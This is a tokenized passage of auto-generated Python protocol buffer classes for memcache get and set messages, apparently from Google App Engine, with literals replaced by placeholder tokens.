) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . key_size ( ) ) : self . add_key ( x . key ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_for_cas ( ) ) : self . set_for_cas ( x . for_cas ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . key_ ) != len ( x . key_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . key_ , x . key_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ != x . has_for_cas_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ and self . for_cas_ != x . for_cas_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . key_ ) <EOL> for i in xrange ( len ( self . key_ ) ) : n += self . lengthString ( len ( self . key_ [ i ] ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . key_ ) <EOL> for i in xrange ( len ( self . key_ ) ) : n += self . lengthString ( len ( self . key_ [ i ] ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_for_cas ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ [ i ] ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ [ i ] ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . add_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_for_cas ( d . getBoolean ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . key_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_for_cas_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . for_cas_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:2> <EOL> kfor_cas = <NUM_LIT:4> <EOL> koverride = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGetResponse_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_cas_id_ = <NUM_LIT:0> <EOL> cas_id_ = <NUM_LIT:0> <EOL> has_expires_in_seconds_ = <NUM_LIT:0> <EOL> expires_in_seconds_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def cas_id ( self ) : return self . cas_id_ <EOL> def set_cas_id ( self , x ) : <EOL> self . has_cas_id_ = <NUM_LIT:1> <EOL> self . cas_id_ = x <EOL> def clear_cas_id ( self ) : <EOL> if self . has_cas_id_ : <EOL> self . has_cas_id_ = <NUM_LIT:0> <EOL> self . cas_id_ = <NUM_LIT:0> <EOL> def has_cas_id ( self ) : return self . has_cas_id_ <EOL> def expires_in_seconds ( self ) : return self . expires_in_seconds_ <EOL> def set_expires_in_seconds ( self , x ) : <EOL> self . has_expires_in_seconds_ = <NUM_LIT:1> <EOL> self . expires_in_seconds_ = x <EOL> def clear_expires_in_seconds ( self ) : <EOL> if self . has_expires_in_seconds_ : <EOL> self . has_expires_in_seconds_ = <NUM_LIT:0> <EOL> self . expires_in_seconds_ = <NUM_LIT:0> <EOL> def has_expires_in_seconds ( self ) : return self . has_expires_in_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_cas_id ( ) ) : self . set_cas_id ( x . cas_id ( ) ) <EOL> if ( x . has_expires_in_seconds ( ) ) : self . set_expires_in_seconds ( x . expires_in_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ != x . has_cas_id_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ and self . cas_id_ != x . cas_id_ : return <NUM_LIT:0> <EOL> if self . has_expires_in_seconds_ != x . has_expires_in_seconds_ : return <NUM_LIT:0> <EOL> if self . has_expires_in_seconds_ and self . expires_in_seconds_ != x . expires_in_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_expires_in_seconds_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . expires_in_seconds_ ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_expires_in_seconds_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . expires_in_seconds_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_cas_id ( ) <EOL> self . clear_expires_in_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_expires_in_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . expires_in_seconds_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_expires_in_seconds_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . expires_in_seconds_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_cas_id ( d . get64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_expires_in_seconds ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . flags_ ) ) <EOL> if self . has_cas_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed64 ( self . cas_id_ ) ) <EOL> if self . has_expires_in_seconds_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . expires_in_seconds_ ) ) <EOL> return res <EOL> class MemcacheGetResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheGetResponse_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemkey = <NUM_LIT:2> <EOL> kItemvalue = <NUM_LIT:3> <EOL> kItemflags = <NUM_LIT:4> <EOL> kItemcas_id = <NUM_LIT:5> <EOL> kItemexpires_in_seconds = <NUM_LIT:6> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:key>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> } , <NUM_LIT:6> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:6> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheSetRequest_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_set_policy_ = <NUM_LIT:0> <EOL> set_policy_ = <NUM_LIT:1> <EOL> has_expiration_time_ = <NUM_LIT:0> <EOL> expiration_time_ = <NUM_LIT:0> <EOL> has_cas_id_ = <NUM_LIT:0> <EOL> cas_id_ = <NUM_LIT:0> <EOL> has_for_cas_ = <NUM_LIT:0> <EOL> for_cas_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def set_policy ( self ) : return self . set_policy_ <EOL> def set_set_policy ( self , x ) : <EOL> self . has_set_policy_ = <NUM_LIT:1> <EOL> self . set_policy_ = x <EOL> def clear_set_policy ( self ) : <EOL> if self . has_set_policy_ : <EOL> self . has_set_policy_ = <NUM_LIT:0> <EOL> self . set_policy_ = <NUM_LIT:1> <EOL> def has_set_policy ( self ) : return self . has_set_policy_ <EOL> def expiration_time ( self ) : return self . expiration_time_ <EOL> def set_expiration_time ( self , x ) : <EOL> self . has_expiration_time_ = <NUM_LIT:1> <EOL> self . expiration_time_ = x <EOL> def clear_expiration_time ( self ) : <EOL> if self . has_expiration_time_ : <EOL> self . has_expiration_time_ = <NUM_LIT:0> <EOL> self . expiration_time_ = <NUM_LIT:0> <EOL> def has_expiration_time ( self ) : return self . has_expiration_time_ <EOL> def cas_id ( self ) : return self . cas_id_ <EOL> def set_cas_id ( self , x ) : <EOL> self . has_cas_id_ = <NUM_LIT:1> <EOL> self . cas_id_ = x <EOL> def clear_cas_id ( self ) : <EOL> if self . has_cas_id_ : <EOL> self . has_cas_id_ = <NUM_LIT:0> <EOL> self . cas_id_ = <NUM_LIT:0> <EOL> def has_cas_id ( self ) : return self . has_cas_id_ <EOL> def for_cas ( self ) : return self . for_cas_ <EOL> def set_for_cas ( self , x ) : <EOL> self . has_for_cas_ = <NUM_LIT:1> <EOL> self . for_cas_ = x <EOL> def clear_for_cas ( self ) : <EOL> if self . has_for_cas_ : <EOL> self . has_for_cas_ = <NUM_LIT:0> <EOL> self . for_cas_ = <NUM_LIT:0> <EOL> def has_for_cas ( self ) : return self . has_for_cas_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_set_policy ( ) ) : self . set_set_policy ( x . set_policy ( ) ) <EOL> if ( x . has_expiration_time ( ) ) : self . set_expiration_time ( x . expiration_time ( ) ) <EOL> if ( x . has_cas_id ( ) ) : self . set_cas_id ( x . cas_id ( ) ) <EOL> if ( x . has_for_cas ( ) ) : self . set_for_cas ( x . for_cas ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_set_policy_ != x . has_set_policy_ : return <NUM_LIT:0> <EOL> if self . has_set_policy_ and self . set_policy_ != x . set_policy_ : return <NUM_LIT:0> <EOL> if self . has_expiration_time_ != x . has_expiration_time_ : return <NUM_LIT:0> <EOL> if self . has_expiration_time_ and self . expiration_time_ != x . expiration_time_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ != x . has_cas_id_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ and self . cas_id_ != x . cas_id_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ != x . has_for_cas_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ and self . for_cas_ != x . for_cas_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_set_policy_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_set_policy_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_set_policy ( ) <EOL> self . clear_expiration_time ( ) <EOL> self . clear_cas_id ( ) <EOL> self . clear_for_cas ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_set_policy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . set_policy_ ) <EOL> if ( self . has_expiration_time_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . expiration_time_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) 